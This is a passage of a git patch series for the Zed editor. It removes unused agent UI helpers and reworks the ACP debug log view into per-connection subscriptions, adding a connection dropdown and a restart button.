cx.listener(move |this, _, window, cx| { - this.workspace - .update(cx, |workspace, cx| { - workspace - .show_worktree_trust_security_modal(true, window, cx) - }) - .log_err(); - }) - }), - ), - ) - } - fn key_context(&self) -> KeyContext { let mut key_context = KeyContext::new_with_defaults(); key_context.add("AgentPanel"); @@ -3675,7 +3561,6 @@ impl Render for AgentPanel { } })) .child(self.render_toolbar(window, cx)) - .children(self.render_workspace_trust_message(cx)) .children(self.render_new_user_onboarding(window, cx)) .map(|parent| match self.visible_surface() { VisibleSurface::Uninitialized => parent, diff --git a/crates/agent_ui/src/conversation_view.rs b/crates/agent_ui/src/conversation_view.rs index 
a32eaed2ddfdf8..3b2381f1c20747 100644 --- a/crates/agent_ui/src/conversation_view.rs +++ b/crates/agent_ui/src/conversation_view.rs @@ -1,9 +1,8 @@ use acp_thread::{ - AcpThread, AcpThreadEvent, AgentSessionInfo, AgentThreadEntry, AssistantMessage, - AssistantMessageChunk, AuthRequired, LoadError, MaxOutputTokensError, MentionUri, - PermissionOptionChoice, PermissionOptions, PermissionPattern, RetryStatus, - SelectedPermissionOutcome, ThreadStatus, ToolCall, ToolCallContent, ToolCallStatus, - UserMessageId, + AcpThread, AcpThreadEvent, AgentThreadEntry, AssistantMessage, AssistantMessageChunk, + AuthRequired, LoadError, MaxOutputTokensError, MentionUri, PermissionOptionChoice, + PermissionOptions, PermissionPattern, RetryStatus, SelectedPermissionOutcome, ThreadStatus, + ToolCall, ToolCallContent, ToolCallStatus, UserMessageId, }; use acp_thread::{AgentConnection, Plan}; use action_log::{ActionLog, ActionLogTelemetry, DiffStats}; @@ -1335,10 +1334,6 @@ impl ConversationView { } } - pub fn workspace(&self) -> &WeakEntity { - &self.workspace - } - pub fn agent_key(&self) -> &Agent { &self.connection_key } diff --git a/crates/agent_ui/src/conversation_view/thread_view.rs b/crates/agent_ui/src/conversation_view/thread_view.rs index 34699d15a064d3..accc82a2ff7323 100644 --- a/crates/agent_ui/src/conversation_view/thread_view.rs +++ b/crates/agent_ui/src/conversation_view/thread_view.rs @@ -312,7 +312,6 @@ pub struct ThreadView { pub new_server_version_available: Option, pub resumed_without_history: bool, pub(crate) permission_selections: HashMap, - pub resume_thread_metadata: Option, pub _cancel_task: Option>, _save_task: Option>, _draft_resolve_task: Option>, @@ -538,7 +537,6 @@ impl ThreadView { is_loading_contents: false, new_server_version_available: None, permission_selections: HashMap::default(), - resume_thread_metadata: None, _cancel_task: None, _save_task: None, _draft_resolve_task: None, @@ -623,10 +621,6 @@ impl ThreadView { } } - pub fn is_draft(&self, cx: 
&App) -> bool { - self.thread.read(cx).entries().is_empty() - } - pub(crate) fn as_native_connection( &self, cx: &App, @@ -2164,43 +2158,6 @@ impl ThreadView { ) } - pub fn handle_open_rules( - &mut self, - _: &ClickEvent, - window: &mut Window, - cx: &mut Context, - ) { - let Some(thread) = self.as_native_thread(cx) else { - return; - }; - let project_context = thread.read(cx).project_context().read(cx); - - let project_entry_ids = project_context - .worktrees - .iter() - .flat_map(|worktree| worktree.rules_file.as_ref()) - .map(|rules_file| ProjectEntryId::from_usize(rules_file.project_entry_id)) - .collect::>(); - - self.workspace - .update(cx, move |workspace, cx| { - // TODO: Open a multibuffer instead? In some cases this doesn't make the set of rules - // files clear. For example, if rules file 1 is already open but rules file 2 is not, - // this would open and focus rules file 2 in a tab that is not next to rules file 1. - let project = workspace.project().read(cx); - let project_paths = project_entry_ids - .into_iter() - .flat_map(|entry_id| project.path_for_entry(entry_id, cx)) - .collect::>(); - for project_path in project_paths { - workspace - .open_path(project_path, None, true, window, cx) - .detach_and_log_err(cx); - } - }) - .ok(); - } - fn activity_bar_bg(&self, cx: &Context) -> Hsla { let editor_bg_color = cx.theme().colors().editor_background; let active_color = cx.theme().colors().element_selected; diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index d94e0d8782bc54..cdff9785df78b1 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -608,51 +608,6 @@ impl InlineAssistant { assist_to_focus } - pub fn suggest_assist( - &mut self, - editor: &Entity, - mut range: Range, - initial_prompt: String, - initial_transaction_id: Option, - focus: bool, - workspace: Entity, - thread_store: Entity, - prompt_store: Option>, - window: &mut Window, - cx: &mut App, - ) 
-> InlineAssistId { - let buffer = editor.read(cx).buffer().clone(); - { - let snapshot = buffer.read(cx).read(cx); - range.start = range.start.bias_left(&snapshot); - range.end = range.end.bias_right(&snapshot); - } - - let project = workspace.read(cx).project().downgrade(); - - let assist_id = self - .batch_assist( - editor, - workspace.downgrade(), - project, - thread_store, - prompt_store, - Some(initial_prompt), - window, - &[range], - None, - initial_transaction_id, - cx, - ) - .expect("batch_assist returns an id if there's only one range"); - - if focus { - self.focus_assist(assist_id, window, cx); - } - - assist_id - } - fn insert_assist_blocks( &self, editor: &Entity, diff --git a/crates/agent_ui/src/inline_prompt_editor.rs b/crates/agent_ui/src/inline_prompt_editor.rs index 58a67d2578dd50..4683561528323a 100644 --- a/crates/agent_ui/src/inline_prompt_editor.rs +++ b/crates/agent_ui/src/inline_prompt_editor.rs @@ -1541,26 +1541,6 @@ pub enum CodegenStatus { Error(anyhow::Error), } -/// This is just CodegenStatus without the anyhow::Error, which causes a lifetime issue for rendering the Cancel button. 
-#[derive(Copy, Clone)] -pub enum CancelButtonState { - Idle, - Pending, - Done, - Error, -} - -impl Into for &CodegenStatus { - fn into(self) -> CancelButtonState { - match self { - CodegenStatus::Idle => CancelButtonState::Idle, - CodegenStatus::Pending => CancelButtonState::Pending, - CodegenStatus::Done => CancelButtonState::Done, - CodegenStatus::Error(_) => CancelButtonState::Error, - } - } -} - #[derive(Copy, Clone)] pub enum GenerationMode { Generate, diff --git a/crates/agent_ui/src/mention_set.rs b/crates/agent_ui/src/mention_set.rs index 6b552610cf42a6..f62181c9f3d3e8 100644 --- a/crates/agent_ui/src/mention_set.rs +++ b/crates/agent_ui/src/mention_set.rs @@ -186,11 +186,6 @@ impl MentionSet { self.mentions.drain() } - #[cfg(test)] - pub fn has_thread_store(&self) -> bool { - self.thread_store.is_some() - } - pub fn confirm_mention_completion( &mut self, crease_text: SharedString, diff --git a/crates/agent_ui/src/message_editor.rs b/crates/agent_ui/src/message_editor.rs index 213ce4e88c9172..401c282201d84f 100644 --- a/crates/agent_ui/src/message_editor.rs +++ b/crates/agent_ui/src/message_editor.rs @@ -35,7 +35,7 @@ use rope::Point; use settings::Settings; use std::{fmt::Write, ops::Range, rc::Rc, sync::Arc}; use theme_settings::ThemeSettings; -use ui::{ContextMenu, Disclosure, ElevationIndex, prelude::*}; +use ui::{ContextMenu, prelude::*}; use util::paths::PathStyle; use util::{ResultExt, debug_panic}; use workspace::{CollaboratorId, Workspace}; @@ -1295,22 +1295,6 @@ impl MessageEditor { .detach(); } - /// Inserts code snippets as creases into the editor. - /// Each tuple contains (code_text, crease_title). 
- pub fn insert_code_creases( - &mut self, - creases: Vec<(String, String)>, - window: &mut Window, - cx: &mut Context, - ) { - self.editor.update(cx, |editor, cx| { - editor.insert("\n", window, cx); - }); - for (text, crease_title) in creases { - self.insert_crease_impl(text, crease_title, IconName::TextSnippet, true, window, cx); - } - } - pub fn insert_branch_diff_crease(&mut self, window: &mut Window, cx: &mut Context) { let Some(workspace) = self.workspace.upgrade() else { return; @@ -1391,70 +1375,6 @@ impl MessageEditor { .detach_and_log_err(cx); } - fn insert_crease_impl( - &mut self, - text: String, - title: String, - icon: IconName, - add_trailing_newline: bool, - window: &mut Window, - cx: &mut Context, - ) { - use editor::display_map::{Crease, FoldPlaceholder}; - use multi_buffer::MultiBufferRow; - use rope::Point; - - self.editor.update(cx, |editor, cx| { - let point = editor - .selections - .newest::(&editor.display_snapshot(cx)) - .head(); - let start_row = MultiBufferRow(point.row); - - editor.insert(&text, window, cx); - - let snapshot = editor.buffer().read(cx).snapshot(cx); - let anchor_before = snapshot.anchor_after(point); - let anchor_after = editor - .selections - .newest_anchor() - .head() - .bias_left(&snapshot); - - if add_trailing_newline { - editor.insert("\n", window, cx); - } - - let fold_placeholder = FoldPlaceholder { - render: Arc::new({ - let title = title.clone(); - move |_fold_id, _fold_range, _cx| { - Button::new("crease", title.clone()) - .layer(ElevationIndex::ElevatedSurface) - .start_icon(Icon::new(icon)) - .into_any_element() - } - }), - merge_adjacent: false, - ..Default::default() - }; - - let crease = Crease::inline( - anchor_before..anchor_after, - fold_placeholder, - |row, is_folded, fold, _window, _cx| { - Disclosure::new(("crease-toggle", row.0 as u64), !is_folded) - .toggle_state(is_folded) - .on_click(move |_e, window, cx| fold(!is_folded, window, cx)) - .into_any_element() - }, - |_, _, _, _| 
gpui::Empty.into_any(), - ); - editor.insert_creases(vec![crease], cx); - editor.fold_at(start_row, window, cx); - }); - } - pub fn insert_selections(&mut self, window: &mut Window, cx: &mut Context) { let editor = self.editor.read(cx); let editor_buffer = editor.buffer().read(cx); From c050c389c37bee31f079afa210766c0457ace9b1 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Fri, 24 Apr 2026 17:53:14 +0200 Subject: [PATCH 024/231] acp: Improve ACP debug view (#54769) Adds a dropdown to the ACP logs which lets you specify which agent connection to look at. Also adds a button to restart the connection. image Release Notes: - N/A --- Cargo.lock | 5 +- crates/acp_tools/Cargo.toml | 4 +- crates/acp_tools/src/acp_tools.rs | 878 +++++++++--------- crates/agent_servers/Cargo.toml | 3 +- crates/agent_servers/src/acp.rs | 203 +++- crates/agent_servers/src/agent_servers.rs | 5 +- crates/agent_ui/src/agent_connection_store.rs | 27 + crates/agent_ui/src/agent_ui.rs | 3 +- 8 files changed, 643 insertions(+), 485 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5ae684b0a5c336..f825e9f2bc60c5 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -52,16 +52,16 @@ name = "acp_tools" version = "0.1.0" dependencies = [ "agent-client-protocol", + "agent_servers", + "agent_ui", "collections", "gpui", "language", - "log", "markdown", "project", "serde", "serde_json", "settings", - "smol", "theme_settings", "ui", "util", @@ -277,7 +277,6 @@ name = "agent_servers" version = "0.1.0" dependencies = [ "acp_thread", - "acp_tools", "action_log", "agent-client-protocol", "anyhow", diff --git a/crates/acp_tools/Cargo.toml b/crates/acp_tools/Cargo.toml index 2d7162b9dec538..2613d39962b02f 100644 --- a/crates/acp_tools/Cargo.toml +++ b/crates/acp_tools/Cargo.toml @@ -18,15 +18,15 @@ test-support = ["workspace/test-support"] [dependencies] agent-client-protocol.workspace = true +agent_servers.workspace = true +agent_ui.workspace = true collections.workspace = true gpui.workspace = true 
language.workspace= true -log.workspace = true markdown.workspace = true project.workspace = true serde.workspace = true serde_json.workspace = true -smol.workspace = true settings.workspace = true theme_settings.workspace = true ui.workspace = true diff --git a/crates/acp_tools/src/acp_tools.rs b/crates/acp_tools/src/acp_tools.rs index 86ae365c9f8500..8801379578fa36 100644 --- a/crates/acp_tools/src/acp_tools.rs +++ b/crates/acp_tools/src/acp_tools.rs @@ -1,139 +1,46 @@ -use std::{ - collections::{HashSet, VecDeque}, - fmt::Display, - sync::Arc, -}; +use std::{collections::HashSet, fmt::Display, rc::Rc, sync::Arc}; use agent_client_protocol::schema as acp; +use agent_servers::{AcpDebugMessage, AcpDebugMessageContent, AcpDebugMessageDirection}; +use agent_ui::agent_connection_store::AgentConnectionStatus; +use agent_ui::{Agent, AgentConnectionStore, AgentPanel}; use collections::HashMap; use gpui::{ - App, Empty, Entity, EventEmitter, FocusHandle, Focusable, Global, ListAlignment, ListState, - StyleRefinement, Subscription, Task, TextStyleRefinement, Window, actions, list, prelude::*, + App, Empty, Entity, EventEmitter, FocusHandle, Focusable, ListAlignment, ListState, + SharedString, StyleRefinement, Subscription, Task, TextStyleRefinement, WeakEntity, Window, + actions, list, prelude::*, }; use language::LanguageRegistry; use markdown::{CodeBlockRenderer, CopyButtonVisibility, Markdown, MarkdownElement, MarkdownStyle}; use project::{AgentId, Project}; use settings::Settings; use theme_settings::ThemeSettings; -use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*}; +use ui::{ + ContextMenu, CopyButton, DropdownMenu, DropdownStyle, IconPosition, Tooltip, WithScrollbar, + prelude::*, +}; use util::ResultExt as _; use workspace::{ Item, ItemHandle, ToolbarItemEvent, ToolbarItemLocation, ToolbarItemView, Workspace, }; -#[derive(Clone, Copy, PartialEq, Eq)] -pub enum StreamMessageDirection { - Incoming, - Outgoing, - /// Lines captured from the agent's stderr. 
These are not part of the - /// JSON-RPC protocol, but agents often emit useful diagnostics there. - Stderr, -} - -#[derive(Clone)] -pub enum StreamMessageContent { - Request { - id: acp::RequestId, - method: Arc, - params: Option, - }, - Response { - id: acp::RequestId, - result: Result, acp::Error>, - }, - Notification { - method: Arc, - params: Option, - }, - /// A raw stderr line from the agent process. - Stderr { line: Arc }, -} - -#[derive(Clone)] -pub struct StreamMessage { - pub direction: StreamMessageDirection, - pub message: StreamMessageContent, -} - -impl StreamMessage { - /// Build a `StreamMessage` from a raw line captured off the transport. - /// - /// For `Stderr`, the line is wrapped as-is (no JSON parsing). For - /// `Incoming`/`Outgoing`, the line is parsed as JSON-RPC; returns `None` - /// if it doesn't look like a valid JSON-RPC message. - pub fn from_raw_line(direction: StreamMessageDirection, line: &str) -> Option { - if direction == StreamMessageDirection::Stderr { - return Some(StreamMessage { - direction, - message: StreamMessageContent::Stderr { - line: Arc::from(line), - }, - }); - } - - let value: serde_json::Value = serde_json::from_str(line).ok()?; - let obj = value.as_object()?; - - let parsed_id = obj - .get("id") - .map(|raw| serde_json::from_value::(raw.clone())); - - let message = if let Some(method) = obj.get("method").and_then(|m| m.as_str()) { - match parsed_id { - Some(Ok(id)) => StreamMessageContent::Request { - id, - method: method.into(), - params: obj.get("params").cloned(), - }, - Some(Err(err)) => { - log::warn!("Skipping JSON-RPC message with unparsable id: {err}"); - return None; - } - None => StreamMessageContent::Notification { - method: method.into(), - params: obj.get("params").cloned(), - }, - } - } else if let Some(parsed_id) = parsed_id { - let id = match parsed_id { - Ok(id) => id, - Err(err) => { - log::warn!("Skipping JSON-RPC response with unparsable id: {err}"); - return None; - } - }; - if let 
Some(error) = obj.get("error") { - let acp_err = - serde_json::from_value::(error.clone()).unwrap_or_else(|err| { - log::warn!("Failed to deserialize ACP error: {err}"); - acp::Error::internal_error().data(error.to_string()) - }); - StreamMessageContent::Response { - id, - result: Err(acp_err), - } - } else { - StreamMessageContent::Response { - id, - result: Ok(obj.get("result").cloned()), - } - } - } else { - return None; - }; - - Some(StreamMessage { direction, message }) - } -} - actions!(dev, [OpenAcpLogs]); pub fn init(cx: &mut App) { cx.observe_new( |workspace: &mut Workspace, _window, _cx: &mut Context| { workspace.register_action(|workspace, _: &OpenAcpLogs, window, cx| { - let acp_tools = - Box::new(cx.new(|cx| AcpTools::new(workspace.project().clone(), cx))); + let connection_store = workspace + .panel::(cx) + .map(|panel| panel.read(cx).connection_store().clone()); + let acp_tools = Box::new(cx.new(|cx| { + AcpTools::new( + workspace.weak_handle(), + workspace.project().clone(), + connection_store, + cx, + ) + })); workspace.add_item_to_active_pane(acp_tools, None, true, window, cx); }); }, @@ -141,177 +48,21 @@ pub fn init(cx: &mut App) { .detach(); } -struct GlobalAcpConnectionRegistry(Entity); - -impl Global for GlobalAcpConnectionRegistry {} - -/// A raw line captured from the transport (or from stderr), tagged with -/// direction. Deserialization into [`StreamMessage`] happens on the -/// registry's foreground task so the ring buffer can be replayed to late -/// subscribers. -struct RawStreamLine { - direction: StreamMessageDirection, - line: Arc, -} - -/// Handle to an ACP connection's log tap. Passed back by -/// [`AcpConnectionRegistry::set_active_connection`] so that the connection -/// can publish transport and stderr lines without knowing anything about -/// the logs panel's channel. -/// -/// Every line is buffered into the registry's ring, so opening the ACP logs -/// panel after the fact still shows history. 
The steady-state cost is -/// negligible compared to the JSON-RPC serialization that already happened -/// to produce the line. -#[derive(Clone)] -pub struct AcpLogTap { - sender: smol::channel::Sender, -} - -impl AcpLogTap { - fn emit(&self, direction: StreamMessageDirection, line: &str) { - self.sender - .try_send(RawStreamLine { - direction, - line: Arc::from(line), - }) - .log_err(); - } - - /// Record a line read from the agent's stdout. - pub fn emit_incoming(&self, line: &str) { - self.emit(StreamMessageDirection::Incoming, line); - } - - /// Record a line written to the agent's stdin. - pub fn emit_outgoing(&self, line: &str) { - self.emit(StreamMessageDirection::Outgoing, line); - } - - /// Record a line read from the agent's stderr. - pub fn emit_stderr(&self, line: &str) { - self.emit(StreamMessageDirection::Stderr, line); - } -} - -/// Maximum number of messages retained in the registry's backlog. -/// -/// Mirrors `MAX_STORED_LOG_ENTRIES` in the LSP log store, so that opening the -/// ACP logs panel after a session has been running for a while still shows -/// meaningful history. -const MAX_BACKLOG_MESSAGES: usize = 2000; - -#[derive(Default)] -pub struct AcpConnectionRegistry { - active_agent_id: Option, - generation: u64, - /// Bounded ring buffer of every message observed on the current connection. - /// When a new connection is set, this is cleared. - backlog: VecDeque, - subscribers: Vec>, - _broadcast_task: Option>, -} - -impl AcpConnectionRegistry { - pub fn default_global(cx: &mut App) -> Entity { - if cx.has_global::() { - cx.global::().0.clone() - } else { - let registry = cx.new(|_cx| AcpConnectionRegistry::default()); - cx.set_global(GlobalAcpConnectionRegistry(registry.clone())); - registry - } - } - - /// Register a new active connection and return an [`AcpLogTap`] that - /// the connection should hand to its transport + stderr readers. 
- /// - /// The tap begins capturing immediately so that opening the ACP logs - /// panel after something has already gone wrong still shows the - /// leading history (up to [`MAX_BACKLOG_MESSAGES`]). - pub fn set_active_connection( - &mut self, - agent_id: AgentId, - cx: &mut Context, - ) -> AcpLogTap { - let (sender, raw_rx) = smol::channel::unbounded::(); - let tap = AcpLogTap { sender }; - - self.active_agent_id = Some(agent_id); - self.generation += 1; - self.backlog.clear(); - self.subscribers.clear(); - - self._broadcast_task = Some(cx.spawn(async move |this, cx| { - while let Ok(raw) = raw_rx.recv().await { - this.update(cx, |this, _cx| { - let Some(message) = StreamMessage::from_raw_line(raw.direction, &raw.line) - else { - return; - }; - - if this.backlog.len() == MAX_BACKLOG_MESSAGES { - this.backlog.pop_front(); - } - this.backlog.push_back(message.clone()); - - this.subscribers.retain(|sender| !sender.is_closed()); - for sender in &this.subscribers { - sender.try_send(message.clone()).log_err(); - } - }) - .log_err(); - } - - // The transport closed — clear state so observers (e.g. the ACP - // logs tab) can transition back to the disconnected state. - this.update(cx, |this, cx| { - this.active_agent_id = None; - this.subscribers.clear(); - cx.notify(); - }) - .log_err(); - })); - - cx.notify(); - tap - } - - /// Clear the retained message history for the current connection and force - /// watchers to resubscribe so their local correlation state is reset too. - pub fn clear_messages(&mut self, cx: &mut Context) { - self.backlog.clear(); - self.generation += 1; - self.subscribers.clear(); - cx.notify(); - } - - /// Subscribe to messages on the current connection. - /// - /// Returns the existing backlog (already-observed messages) together with - /// a receiver for new messages. 
The caller is responsible for flushing the - /// backlog into its local state before draining the receiver, so that no - /// messages are dropped between the snapshot and live subscription. - pub fn subscribe(&mut self) -> (Vec, smol::channel::Receiver) { - let backlog = self.backlog.iter().cloned().collect(); - let (sender, receiver) = smol::channel::unbounded(); - self.subscribers.push(sender); - (backlog, receiver) - } -} - struct AcpTools { + workspace: WeakEntity, project: Entity, focus_handle: FocusHandle, expanded: HashSet, - watched_connection: Option, - connection_registry: Entity, - _subscription: Subscription, + watched_connections: HashMap, + selected_connection: Option, + connection_store: Option>, + _workspace_subscription: Option, + _connection_store_subscription: Option, } struct WatchedConnection { agent_id: AgentId, - generation: u64, + connection: Rc, messages: Vec, list_state: ListState, incoming_request_methods: HashMap>, @@ -320,156 +71,278 @@ struct WatchedConnection { } impl AcpTools { - fn new(project: Entity, cx: &mut Context) -> Self { - let connection_registry = AcpConnectionRegistry::default_global(cx); - - let subscription = cx.observe(&connection_registry, |this, _, cx| { - this.update_connection(cx); - cx.notify(); + fn new( + workspace: WeakEntity, + project: Entity, + connection_store: Option>, + cx: &mut Context, + ) -> Self { + let workspace_subscription = workspace.upgrade().map(|workspace| { + cx.observe(&workspace, |this, _, cx| { + this.update_connection_store(cx); + }) }); - let mut this = Self { + let mut acp_tools = Self { + workspace, project, focus_handle: cx.focus_handle(), expanded: HashSet::default(), - watched_connection: None, - connection_registry, - _subscription: subscription, + watched_connections: HashMap::default(), + selected_connection: None, + connection_store: None, + _workspace_subscription: workspace_subscription, + _connection_store_subscription: None, }; - this.update_connection(cx); - this + 
acp_tools.set_connection_store(connection_store, cx); + acp_tools } - fn update_connection(&mut self, cx: &mut Context) { - let (generation, agent_id) = { - let registry = self.connection_registry.read(cx); - (registry.generation, registry.active_agent_id.clone()) - }; - - let Some(agent_id) = agent_id else { - self.watched_connection = None; - self.expanded.clear(); + fn set_connection_store( + &mut self, + connection_store: Option>, + cx: &mut Context, + ) { + if self.connection_store == connection_store { return; - }; - - if let Some(watched) = self.watched_connection.as_ref() { - if watched.generation == generation { - return; - } } - self.expanded.clear(); + self.connection_store = connection_store.clone(); + self._connection_store_subscription = connection_store.as_ref().map(|connection_store| { + cx.observe(connection_store, |this, _, cx| { + this.refresh_connections(cx); + }) + }); + self.refresh_connections(cx); + } + + fn update_connection_store(&mut self, cx: &mut Context) { + let connection_store = self.workspace.upgrade().and_then(|workspace| { + workspace + .read(cx) + .panel::(cx) + .map(|panel| panel.read(cx).connection_store().clone()) + }); + self.set_connection_store(connection_store, cx); + } - let (backlog, messages_rx) = self - .connection_registry - .update(cx, |registry, _cx| registry.subscribe()); + fn refresh_connections(&mut self, cx: &mut Context) { + let active_connections = self + .connection_store + .as_ref() + .map(|connection_store| connection_store.read(cx).active_acp_connections(cx)) + .unwrap_or_default(); + + self.watched_connections + .retain(|agent_id, watched_connection| { + active_connections.iter().any(|active_connection| { + active_connection.agent_id == *agent_id + && Rc::ptr_eq( + &active_connection.connection, + &watched_connection.connection, + ) + }) + }); - let task = cx.spawn(async move |this, cx| { - while let Ok(message) = messages_rx.recv().await { - this.update(cx, |this, cx| { - 
this.push_stream_message(message, cx); + for active_connection in active_connections { + if self + .watched_connections + .get(&active_connection.agent_id) + .is_some_and(|watched_connection| { + Rc::ptr_eq( + &active_connection.connection, + &watched_connection.connection, + ) }) - .log_err(); + { + continue; } - }); - self.watched_connection = Some(WatchedConnection { - agent_id, - generation, - messages: vec![], - list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), - incoming_request_methods: HashMap::default(), - outgoing_request_methods: HashMap::default(), - _task: task, - }); + let (backlog, messages_rx) = active_connection.connection.subscribe_debug_messages(); + let agent_id = active_connection.agent_id.clone(); + let task = cx.spawn({ + let agent_id = agent_id.clone(); + async move |this, cx| { + while let Ok(message) = messages_rx.recv().await { + this.update(cx, |this, cx| { + this.push_stream_message(&agent_id, message, cx); + }) + .log_err(); + } + } + }); - for message in backlog { - self.push_stream_message(message, cx); + let mut watched_connection = WatchedConnection { + agent_id: agent_id.clone(), + messages: Vec::new(), + list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)), + connection: active_connection.connection.clone(), + incoming_request_methods: HashMap::default(), + outgoing_request_methods: HashMap::default(), + _task: task, + }; + + for message in backlog { + push_stream_message_for_connection( + &mut watched_connection, + &self.project, + message, + cx, + ); + } + + self.watched_connections + .insert(agent_id, watched_connection); } + + self.selected_connection = self + .selected_connection + .clone() + .filter(|agent_id| self.should_keep_selected_connection(agent_id, cx)) + .or_else(|| self.watched_connections.keys().next().cloned()); + self.expanded.clear(); + cx.notify(); + } + + fn should_keep_selected_connection(&self, agent_id: &AgentId, cx: &App) -> bool { + 
self.watched_connections.contains_key(agent_id) + || self + .connection_store + .as_ref() + .is_some_and(|connection_store| { + connection_store + .read(cx) + .connection_status(&Agent::from(agent_id.clone()), cx) + != AgentConnectionStatus::Disconnected + }) + } + + fn select_connection(&mut self, agent_id: Option, cx: &mut Context) { + if self.selected_connection == agent_id { + return; + } + + self.selected_connection = agent_id; + self.expanded.clear(); + cx.notify(); } - fn push_stream_message(&mut self, stream_message: StreamMessage, cx: &mut Context) { - let Some(connection) = self.watched_connection.as_mut() else { + fn restart_selected_connection(&mut self, cx: &mut Context) { + let Some(agent_id) = self.selected_connection.clone() else { + return; + }; + let Some(workspace) = self.workspace.upgrade() else { return; }; - let language_registry = self.project.read(cx).languages().clone(); - let index = connection.messages.len(); - - let (request_id, method, message_type, params) = match stream_message.message { - StreamMessageContent::Request { id, method, params } => { - let method_map = match stream_message.direction { - StreamMessageDirection::Incoming => &mut connection.incoming_request_methods, - StreamMessageDirection::Outgoing => &mut connection.outgoing_request_methods, - // Stderr lines never carry request/response correlation. 
- StreamMessageDirection::Stderr => return, - }; - method_map.insert(id.clone(), method.clone()); - (Some(id), method.into(), MessageType::Request, Ok(params)) - } - StreamMessageContent::Response { id, result } => { - let method_map = match stream_message.direction { - StreamMessageDirection::Incoming => &mut connection.outgoing_request_methods, - StreamMessageDirection::Outgoing => &mut connection.incoming_request_methods, - StreamMessageDirection::Stderr => return, - }; + workspace.update(cx, |workspace, cx| { + let Some(panel) = workspace.panel::(cx) else { + return; + }; - if let Some(method) = method_map.remove(&id) { - (Some(id), method.into(), MessageType::Response, result) - } else { - ( - Some(id), - "[unrecognized response]".into(), - MessageType::Response, - result, - ) - } - } - StreamMessageContent::Notification { method, params } => { - (None, method.into(), MessageType::Notification, Ok(params)) - } - StreamMessageContent::Stderr { line } => { - // Stderr is rendered as plain text inline with JSON-RPC traffic, - // using `stderr` as the pseudo-method name so it shows up in the - // header the same way real methods do. + let fs = workspace.app_state().fs.clone(); + let (thread_store, connection_store) = { + let panel = panel.read(cx); ( - None, - "stderr".into(), - MessageType::Stderr, - Ok(Some(serde_json::Value::String(line.to_string()))), + panel.thread_store().clone(), + panel.connection_store().clone(), ) + }; + let agent = Agent::from(agent_id); + let server = agent.server(fs, thread_store); + connection_store.update(cx, |store, cx| { + store.restart_connection(agent, server, cx); + }); + }); + } + + fn selected_connection_status(&self, cx: &App) -> Option { + let agent = Agent::from(self.selected_connection.clone()?); + Some( + self.connection_store + .as_ref()? 
+ .read(cx) + .connection_status(&agent, cx), + ) + } + + fn selected_watched_connection(&self) -> Option<&WatchedConnection> { + let selected_connection = self.selected_connection.as_ref()?; + self.watched_connections.get(selected_connection) + } + + fn selected_watched_connection_mut(&mut self) -> Option<&mut WatchedConnection> { + let selected_connection = self.selected_connection.clone()?; + self.watched_connections.get_mut(&selected_connection) + } + + fn connection_menu_entries(&self) -> Vec { + let mut entries: Vec<_> = self + .watched_connections + .values() + .map(|connection| connection.agent_id.0.clone()) + .collect(); + entries.sort(); + entries + } + + fn selected_connection_label(&self) -> SharedString { + self.selected_connection + .as_ref() + .map(|agent_id| agent_id.0.clone()) + .unwrap_or_else(|| SharedString::from("No connection selected")) + } + + fn connection_menu(&self, window: &mut Window, cx: &mut Context) -> Entity { + let entries = self.connection_menu_entries(); + let selected_connection = self.selected_connection.clone(); + let acp_tools = cx.entity().downgrade(); + + ContextMenu::build(window, cx, move |mut menu, _window, _cx| { + if entries.is_empty() { + return menu.entry("No active connections", None, |_, _| {}); } - }; - let message = WatchedConnectionMessage { - name: method, - message_type, - request_id, - direction: stream_message.direction, - collapsed_params_md: match params.as_ref() { - Ok(params) => params + for entry in &entries { + let label = entry.clone(); + let is_selected = selected_connection .as_ref() - .map(|params| collapsed_params_md(params, &language_registry, cx)), - Err(err) => { - if let Ok(err) = &serde_json::to_value(err) { - Some(collapsed_params_md(&err, &language_registry, cx)) - } else { - None - } - } - }, + .is_some_and(|agent_id| agent_id.0.as_ref() == label.as_ref()); + let acp_tools = acp_tools.clone(); + menu = menu.toggleable_entry( + label.clone(), + is_selected, + IconPosition::Start, + None, + 
move |_window, cx| { + acp_tools + .update(cx, |this, cx| { + this.select_connection(Some(AgentId(label.clone())), cx); + }) + .ok(); + }, + ); + } - expanded_params_md: None, - params, - }; + menu + }) + } - connection.messages.push(message); - connection.list_state.splice(index..index, 1); + fn push_stream_message( + &mut self, + agent_id: &AgentId, + stream_message: AcpDebugMessage, + cx: &mut Context, + ) { + let Some(connection) = self.watched_connections.get_mut(agent_id) else { + return; + }; + push_stream_message_for_connection(connection, &self.project, stream_message, cx); cx.notify(); } fn serialize_observed_messages(&self) -> Option { - let connection = self.watched_connection.as_ref()?; + let connection = self.selected_watched_connection()?; let messages: Vec = connection .messages @@ -482,9 +355,9 @@ impl AcpTools { }; Some(serde_json::json!({ "_direction": match message.direction { - StreamMessageDirection::Incoming => "incoming", - StreamMessageDirection::Outgoing => "outgoing", - StreamMessageDirection::Stderr => "stderr", + AcpDebugMessageDirection::Incoming => "incoming", + AcpDebugMessageDirection::Outgoing => "outgoing", + AcpDebugMessageDirection::Stderr => "stderr", }, "_type": message.message_type.to_string().to_lowercase(), "id": message.request_id, @@ -498,7 +371,7 @@ impl AcpTools { } fn clear_messages(&mut self, cx: &mut Context) { - if let Some(connection) = self.watched_connection.as_mut() { + if let Some(connection) = self.selected_watched_connection_mut() { connection.messages.clear(); connection.list_state.reset(0); connection.incoming_request_methods.clear(); @@ -514,7 +387,7 @@ impl AcpTools { window: &mut Window, cx: &mut Context, ) -> AnyElement { - let Some(connection) = self.watched_connection.as_ref() else { + let Some(connection) = self.selected_watched_connection() else { return Empty.into_any(); }; @@ -556,25 +429,26 @@ impl AcpTools { this.expanded.remove(&index); } else { this.expanded.insert(index); - let 
